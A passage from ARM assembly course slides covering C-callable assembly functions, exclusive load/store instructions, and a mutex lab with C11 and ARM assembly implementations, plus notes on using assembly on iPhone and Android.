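0x60000010 decodes to Z and C set. 0x80000010 decodes to only N set, which matches the negative result of 6 - 182947 produced by the adds instruction.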
Writing C functions in assembly
In C file, say it is called isawesome.c, declare the function:
  extern int mywork(int arg1, char arg2, ...);
In assembly include
    .syntax unified          @ For UAL
    .arch armv7-a
    .text
    .align 2
    .thumb
    .thumb_func
    .global mywork
    .type mywork, function
    @ CODE HERE
    .size mywork, .-mywork
    .end
In make file use gcc -c -o mywork.o mywork.s
Finally gcc -o awesomeprogram mywork.o isawesome.o
Source: http://omappedia.org/wiki/Writing_ARM_Assembly

Event handling
WFE - Wait for Event, wakes up when either of following happens:
  SEV is called
  A physical IRQ interrupt
  A physical FIQ interrupt
  A physical asynchronous abort
SEV - Send Event
See B1.8.13 in manual for more details
Used with spin-locks

Exclusive instructions
LDREX{B|D|H} <reg1> <Rm>
  Load exclusive from Rm into <reg1>
STREX{B|D|H} <reg1> <reg2> <Rm>
  Store exclusive from <reg2> into <Rm> and write to <reg1> with 0 if successful or 1 if unsuccessful
Both introduced since ARMv6
SWP & SWPB - Used on ARMv6 and earlier, now deprecated
  It is read-locked-write
  However does not allow for operations between the read lock and write
  At that point you use LDREX/STREX

Exclusive instructions contd.
No memory references allowed between LDREX and STREX instructions
However after starting exclusive access using LDREX, can disengage using CLREX instruction
Use of DMB (Data Memory Barrier) in between exclusive accesses
  Ensures correct ordering of memory accesses
  Ensures all explicit memory accesses finish or complete before explicit memory access after the DMB instruction

Lab 5
Atomic lab
Implement a simple mutex in assembly with threads in C
Given code that uses libpthread to do threading
Creates two threads which use dosomething() to do work

Lab 5
Pseudocode for mutex lock:
  Load locked value into a temp register
  Loop:
    LDREX from [r0] and compare to unlocked value
    If [r0] contents have the unlocked value
      STREX value in temp variable into [r0]
    If not successful goto loop
To load locked value, you can use
  ldr r2, =locked
Pseudocode for mutex unlock:
  Load =unlocked value into a temp register
  Store value from temp register into [r0]

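For comparison, the same lock/unlock logic written with C11 atomics. This is not the lab solution, which is meant to be written in assembly; it is a sketch to show the shape of the loop. On ARMv7 a compiler will typically lower the compare-exchange to an LDREX/STREX retry loop with barriers, but that is an implementation detail. The names mirror the lab; try_lock_mutex is an extra helper added here.

```c
#include <stdatomic.h>

enum { UNLOCKED = 0, LOCKED = 1 };

/* Spin until the mutex changes from UNLOCKED to LOCKED under our hand. */
void lock_mutex(atomic_int *m)
{
    int expected;
    do {
        expected = UNLOCKED;    /* compare-exchange overwrites this on failure */
    } while (!atomic_compare_exchange_weak_explicit(
                 m, &expected, LOCKED,
                 memory_order_acquire, memory_order_relaxed));
}

/* Single attempt: returns 1 if the lock was taken, 0 if it was already held. */
int try_lock_mutex(atomic_int *m)
{
    int expected = UNLOCKED;
    return atomic_compare_exchange_strong_explicit(
               m, &expected, LOCKED,
               memory_order_acquire, memory_order_relaxed);
}

/* Release: a plain store with release ordering. */
void unlock_mutex(atomic_int *m)
{
    atomic_store_explicit(m, UNLOCKED, memory_order_release);
}
```

The acquire and release orderings play the role of the DMB barriers: accesses inside the critical section cannot move outside the lock/unlock pair.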
Possible solution
.equ locked, 1
.equ unlocked, 0

.global lock_mutex
.type lock_mutex, function
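lock_mutex:
    ldr r1, =locked          @ r1 = value that marks the mutex as taken
.L1:
    ldrex r2, [r0]           @ exclusive load of the current mutex value
    cmp r2, #0               @ is it unlocked?
    strexeq r2, r1, [r0]     @ if so, try to store locked; r2 = 0 on success
    cmpeq r2, #0             @ did the exclusive store succeed?
    bne .L1                  @ held by someone else or store failed: retry
    bx lr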

.size lock_mutex, .-lock_mutex

@.align 2
@.thumb
@.thumb_func

.global unlock_mutex
.type unlock_mutex, function
unlock_mutex:
ldr r1, =unlocked
str r1, [r0]
bx lr
.size unlock_mutex, .-unlock_mutex
Assembly on iPhone
For iPhone:
  Can use inline assembly as we saw above in Objective-C code
  Include the assembly source file in Xcode
  Have not experimented with Xcode and assembly
  iPhone ABI link:
  http://developer.apple.com/library/ios/documentation/Xcode/Conceptual/iPhoneOSABIReference/iPhoneOSABIReference.pdf

Assembly on Android
For Android:
  Need to use Android Native Development Kit (NDK)
  Write a stub code in C that calls assembly method and uses JNI types
  Write a make file or copy a template and include the new assembly file and the stub-code C file
  Use NDK tool ndk-build to build
  In Android application declare the method using same signature using Java types and mark as native
    public native int myasmfunc(int param1)
  Also load the assembly jni-library
    System.loadLibrary("library-name-here")
Source: http://www.eggwall.com/2011/09/android-arm-assembly-calling-assembly.html

Summary
We covered:
  How boot is handled on ARM platforms
  Some mechanics of ARM assembly and how to debug it using GDB
  How programs are converted to assembly and run, including ATPCS along with control flow hijack vulnerabilities
  Other features of ARM platforms including interrupts and atomic instructions
  How to write inline assembly in C and how to write C functions in assembly (for use in C source)

Useful links
ARM GCC Inline Assembler cookbook
  http://www.ethernut.de/en/documents/arm-inline-asm.html
Writing ARM assembly
  http://omappedia.org/wiki/Writing_ARM_Assembly
ARM architecture diagrams:
  http://www.eng.auburn.edu/~agrawvd/COURSE/E6200_Fall08/CLASS_TALKS/armcores.ppt
How to build the emulator:
  https://developer.mozilla.org/en/Developer_Guide/Virtual_ARM_Linux_environment
GCC manual (ARM optimization options):
  http://gcc.gnu.org/onlinedocs/gcc/ARM-Options.html